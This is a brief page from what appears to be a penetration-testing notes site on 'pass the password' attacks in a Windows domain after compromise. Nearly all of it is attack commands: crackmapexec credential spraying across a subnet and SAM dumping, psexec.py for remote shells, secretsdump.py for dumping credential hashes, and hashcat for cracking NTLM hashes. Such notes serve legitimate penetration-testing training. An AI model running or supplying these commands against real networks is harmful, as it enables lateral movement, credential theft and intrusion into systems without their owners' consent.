Pass the Password

The basic syntax using crackmapexec :

crackmapexec <entire network ip>/<cidr> -d domain -u user -p password

I recommend you check this article too to learn a bit more about the usage of cme :

Getting the goods with CrackMapExec: Part 1 // byt3bl33d3r // /dev/random > blog.py

Once you get the pwn3d machines you can psexec or so, or you can even use some modules and options provided by crackmapexec as shown in the blog. so for example :

To dump the sam file (depends, sometimes it doesn't work) :

crackmapexec <entire network ip>/<cidr> -d domain -u user -p password --sam

psexec :

psexec.py domain/username:password@ip_of_the_machine

secretsdump to dump hashes :

secretsdump.py domain/username:password@ip_of_the_machine

once you dump that and you get the NTLM hashes you can use for example hashcat to crack it (basic command):

hashcat -m 1000 hashfile dict_file -O

you can find more of these cool stuff here :

SMB protocolcheatsheet

PreviousPost-Compromise Attacks NextPass the hash

Last updated 4 years ago